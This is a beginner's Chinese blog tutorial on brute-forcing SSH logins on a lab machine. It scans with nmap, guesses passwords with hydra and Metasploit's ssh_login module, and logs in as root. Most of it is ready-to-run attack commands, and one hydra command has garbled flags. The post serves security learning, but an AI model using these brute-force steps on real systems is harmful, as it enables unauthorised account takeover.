适合新手上路,MSF与hydra两种方式渗透22端口,后进行远程连接,如有不足请各位见谅
此次实验仅供参考,切勿做违法犯罪,出事一切与本人无关后果自负,希望大家早日成为白帽子。
渗透机:kali
靶机:192.168.75.128
1.扫描局域网寻找22端口(开放)
nmap 192.168.75.1/24
![](https://img-blog.csdnimg.cn/img_convert/0fb748dac995bf692fefa39c4152c52a.png)
2.已知192.168.75.128的22端口处于开放状态,22端口可以用hydra或msf爆破
第一种: hydra -L user.txt -P pass.txt -1 -vV -ens 192.168.75.128 ssh (比较慢且命令参数多)
Hydra -L user.txt -P pass.txt -V 192.168.75.128 ssh
第二个种MSF:
3.进入msfconsole
Search ssh_login 显示渗透指令
![](https://img-blog.csdnimg.cn/img_convert/d76e515183de9f103c31be01671cea2a.png)
4.Use 0 设置第一种
![](https://img-blog.csdnimg.cn/img_convert/483088257ddfbdfd6b99accdd4d4b576.png)
5.查看配置信息
![](https://img-blog.csdnimg.cn/img_convert/72cb59f4e511ece9dfac1b0626c93aa4.png)
6.set rhosts 192.168.75.128 设置目标ip
![](https://img-blog.csdnimg.cn/img_convert/eb910bedd03c9e65926068c8b5198e34.png)
8.set user_file user.txt 设置用户字典
![](https://img-blog.csdnimg.cn/img_convert/c334b96b04902d9f52f5b8a35c0ef7f0.png)
9.set pass_file pass.txt 设置密码字典
![](https://img-blog.csdnimg.cn/img_convert/6fc0681936724a46bcd1e05e9209635b.png)
10.exploit或run 开始爆破
![](https://img-blog.csdnimg.cn/img_convert/68254b5631423f4dcd31c8dff748c7bb.png)
爆破结果: 用户名root 密码:ban
11.ssh 192.168.75.128 输入用户名密码
![](https://img-blog.csdnimg.cn/img_convert/214cf8aef4caf73755ac7873ea91e41f.png)
实验结束
由于时间原因,大家可以直接采用hydra进行弱口令爆破,另外需自己准备好爆破字典,日后都会更新网安相关知识,感兴趣的伙伴点个关注,如有不足之处请见谅,本人也是刚写博客不久。